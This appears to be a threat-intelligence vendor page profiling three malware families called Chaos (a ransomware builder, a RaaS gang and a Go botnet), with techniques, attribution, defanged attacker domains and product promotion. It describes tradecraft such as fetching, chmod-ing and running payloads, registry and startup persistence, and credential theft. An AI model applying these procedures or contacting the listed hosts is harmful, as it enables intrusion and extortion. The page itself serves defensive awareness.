Chaos
Chaos refers to multiple distinct malware families and operations in the provided content, most notably: (1) a ransomware builder/ransomware family monitored since 2021; (2) a separate ransomware-as-a-service (RaaS) operation active since February 2025; and (3) a Go-based cross-platform botnet malware first documented in September 2022. The 2021-era Chaos ransomware/builder is associated with Windows-focused ransomware activity, persistence via the Windows registry and Startup folder, self-copying to %appdata% and root drives, shadow copy deletion, delayed execution, and single-instance enforcement. Reporting cited in the content notes attackers used a leaked Chaos builder to create ransomware payloads, and that variants were observed copying themselves to AppData as cmd.exe and creating startup-folder artifacts such as cmd.url. The leaked builder was also linked to operations such as Twelve, and Onyx ransomware was assessed as being based on Chaos; Onyx was described as a .NET ransomware using AES and RSA, appending .ampkcz, dropping readme.txt, deleting shadow copies and backup catalogs, modifying RunOnce for persistence, and overwriting files larger than 2 MB with random data. The content also links Chaos-builder-derived ransomware to the threat actor Twelve, which used leaked Chaos-built samples alongside LockBit-derived ransomware and Shamoon-like wipers in destructive attacks against Russian organizations.
Separately, the content describes a distinct Chaos RaaS operation first observed in February 2025 and assessed with moderate confidence as involving former BlackSuit/Royal/Conti-linked operators. This Chaos operation uses an open affiliate model, recruits on the RAMP forum, and conducts double- or triple-extortion attacks involving data theft, encryption, and reported DDoS threats. It is described as a big-game-hunting operation targeting organizations opportunistically, with most known victims in the United States and additional victims in the United Kingdom, New Zealand, and India; technology and financial services are specifically mentioned as targeted sectors. Its intrusion chain commonly begins with spam flooding and voice phishing to induce victims to open Microsoft Quick Assist sessions, with secondary access via unpatched edge devices or compromised RDP credentials. Post-compromise activity includes deployment of remote management tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM, and Splashtop Streamer; reverse SSH tunnels over port 443; reconnaissance of domain controllers, trusts, users, processes, DNS, and LDAP; credential theft with Mimikatz and Kerberoasting; bulk password resets with net.exe; token impersonation; process masquerading; PowerShell log clearing; attempted removal of security or MFA software via WMIC; hidden accounts via Winlogon SpecialAccounts\Userlist; lateral movement over RDP, Impacket/SMB/WMI, and RMM tools; and exfiltration using GoodSync renamed to wininit.exe. The encryptor supports Windows, Linux, ESXi, and NAS systems, uses Curve25519 ECDH and AES-256 with per-file unique keys, performs selective partial-file encryption, appends the .chaos extension, and drops README.chaos.txt or readme.chaos.txt ransom notes. The content also notes that Iranian MOIS-linked MuddyWater intrusions in early 2026 masqueraded as Chaos ransomware attacks as a false flag, using Chaos branding and leak-site theatrics without actually deploying file encryption.
The content further describes a different Chaos malware family first documented by Lumen Black Lotus Labs in September 2022: a Go-based cross-platform malware and botnet historically targeting routers and edge devices and assessed as likely an evolution of Kaiji. This Chaos malware can execute remote shell commands, deploy additional modules, propagate via SSH brute-forcing, mine cryptocurrency, and launch DDoS attacks over HTTP, TLS, TCP, UDP, and WebSocket. Newer variants observed in 2026 expanded targeting to misconfigured cloud and Linux server environments, including Apache Hadoop deployments, where attackers created malicious applications to download, chmod, execute, and delete Chaos binaries from domains such as pan.tenire[.]com. Updated samples were 64-bit ELF binaries, removed some older SSH spreading and router exploitation functions, retained persistence via systemd and keep-alive scripts, and added SOCKS/SOCKS5 proxy capability to relay traffic and potentially pivot into internal networks. The malware’s embedded infrastructure included gmserver.osfc[.]org[.]cn, and reporting cited Chinese-language artifacts, zh-CN locale indicators, and infrastructure overlap with ValleyRAT/Silver Fox activity as circumstantial indicators of possible Chinese origin, though attribution remained unconfirmed.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
While the Chaos ransomware variant copied itself to $ user \ $ appdata \ cmd . exe and launched a new process, the new process in turn created a new file in the startup folder.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files.
The CyberVolk collective is a prime example of how readily threat actors can access and deploy dangerous ransomware builders such as AzzaSec, Diamond, LockBit, Chaos and others.
Nation-state hackers from Iran are deploying the Chaos ransomware as cover for alleged espionage and data theft operations... The Chaos ransomware operation has existed since February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
One of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system. This could permit the malware to jump onto removable drives and escape from air-gapped systems.
Darktrace said it identified the new variant targeting its honeypot network last month, a deliberately misconfigured Hadoop instance that enables remote code execution on the service. In the attack spotted by the cybersecurity company, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application.
Execution
5 techniques
Execution
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
Chaos is a cross-platform malware that can run remote shell commands...
The application, for its part, embedded a sequence of shell commands to retrieve a Chaos agent binary from an attacker-controlled server ('pan.tenire[.]com'), set permissions to allow all users to read, modify, or run it ('chmod 777'), and then actually execute the binary and delete the artifact from disk to minimize the forensic trail.
Persistence
4 techniques
Persistence
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
The malware establishes persistence using systemd and stores a keep-alive script on disk.
For example, the persistence mechanism was always via the registry, but the exact implementation differed by family. Most of the time, autorun was used, but we’ve also seen them using the startup folder.
While the Chaos ransomware variant copied itself to $ user \ $ appdata \ cmd . exe and launched a new process, the new process in turn created a new file in the startup folder: $ user \ $ appdata \ Microsoft \ Windows \ Start Menu \ Programs \ Startup \ cmd . url . This contained the path to the ransomware file
Privilege Escalation
5 techniques
Privilege Escalation
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain
The malware establishes persistence using systemd and stores a keep-alive script on disk.
For example, the persistence mechanism was always via the registry, but the exact implementation differed by family. Most of the time, autorun was used, but we’ve also seen them using the startup folder.
While the Chaos ransomware variant copied itself to $ user \ $ appdata \ cmd . exe and launched a new process, the new process in turn created a new file in the startup folder: $ user \ $ appdata \ Microsoft \ Windows \ Start Menu \ Programs \ Startup \ cmd . url . This contained the path to the ransomware file
Stealth
2 techniques
Stealth
Defense Impairment
2 techniques
Defense Impairment
Credential Access
2 techniques
Credential Access
Discovery
1 technique
Discovery
Lateral Movement
3 techniques
Lateral Movement
It also has the kind of tradecraft defenders should not shrug off: social engineering, remote-management abuse, payload retrieval, staging, and leaked data.
Command and Control
5 techniques
Command and Control
The command-and-control server is reached through an embedded domain, gmserver[.]osfc[.]org[.]cn, which at the time of analysis resolved to an IP address geolocated to Hong Kong.
The new 64-bit ELF binary has removed SSH propagation and router exploit functions, replacing them with a SOCKS proxy feature to ferry traffic and conceal malicious activity.
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
Exfiltration
2 techniques
Exfiltration
Impact
6 techniques
Impact
Instead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files’ contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored
The attackers used a version of the popular LockBit 3.0 ransomware... to encrypt the data
The second version of Chaos added advanced options for administrator privileges, the ability to delete all volume shadow copies and the backup catalog, and the ability to disable Windows recovery mode.
In addition, it gives the ransomware builder’s users the ability to add their own extensions to affected files and the ability to change the desktop wallpaper of their victims.
IOCs tracked for this family
88 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
50 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware derived from a leaked builder and used in some incidents to encrypt files; static analysis linked samples to the Twelve group.
A ransomware variant used by Key Group that copied itself into AppData, launched a new process, and created a startup-folder URL file for persistence.
Chaos is a ransomware-as-a-service operation associated with double-extortion attacks involving data exfiltration and file encryption. In the reported intrusion, its branding and artifacts were used as a false flag, but no encryption occurred.
Ransomware brand used as cover for espionage and data theft operations. In the described incident, attackers conducted social engineering via Microsoft Teams, gained access, stole data, extorted the victim, and notably did not encrypt files, suggesting use of the ransomware label to obscure attribution and operational intent.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.